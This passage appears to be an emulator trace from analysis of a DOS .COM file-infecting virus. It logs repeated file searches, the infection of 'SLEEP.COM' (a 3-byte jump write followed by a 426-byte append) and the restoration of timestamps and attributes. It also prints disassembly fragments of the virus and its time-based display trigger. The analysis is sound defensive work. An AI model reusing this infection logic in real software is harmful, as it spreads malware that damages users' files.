2018-12-25T12:40:45.703201186Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.706007996Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.707626525Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.711221774Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.714290558Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.71603173Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.724212007Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.734012118Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.736864139Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.747689483Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.754897378Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.76139709Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.763421991Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.766500829Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.768173894Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.771007977Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.779202291Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.780920294Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.789287689Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.799014171Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.801880367Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.812790742Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.819651163Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.826557521Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.828868173Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.832039226Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.833649177Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.83642226Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.840259015Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.841938423Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.849310005Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.859988285Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.86277722Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.872554156Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.880336288Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.883047832Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.884358714Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.887856218Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.889229654Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.891618246Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.895678135Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.897464397Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.905318539Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.916132209Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.919197661Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.923448998Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.925829079Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":59,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.375699011Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.379002813Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.38018186Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.38677969Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.402857089Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.40758113Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.413732109Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.415350857Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.418772981Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.420363188Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:45.426109117Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.435876178Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.437617068Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.4460396Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.457511036Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.460616374Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.471532607Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.47997162Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.4873751Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.488953075Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.492250797Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.494677891Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.498123733Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.501392061Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.504303935Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.512627086Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.523500768Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.5274261Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.538374056Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.546586717Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.558643521Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.560367528Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.563283748Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.566617242Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.569521446Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.579108473Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.58182491Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.590383333Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.601153973Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.60300962Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.609453374Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.613683606Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.617983097Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.619781632Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.621880974Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.623099146Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.625413334Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.628255491Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.629812519Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.638969804Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.647206186Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.649117678Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.656328391Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.660731075Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.664919366Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.666681015Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.670097918Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.672021693Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.675545593Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.679152146Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.680785805Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.689674416Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.704633074Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.707260238Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.71784476Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.725850586Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.732711624Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.733958343Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.73761548Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.739610429Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.74273849Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.753234731Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.755133952Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.763005046Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.774672751Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.777337165Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.787679036Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.795425579Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.802253875Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.80362577Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.806727797Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.808149186Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.81048809Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.813809811Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.815583616Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.822783175Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.833046384Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.835636501Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.841930848Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.846419263Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.8507379Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.85171756Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.853494353Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.860785948Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.863544704Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.870389087Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.872144568Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.88001799Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.890363026Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.893441536Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.898532839Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.900355436Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl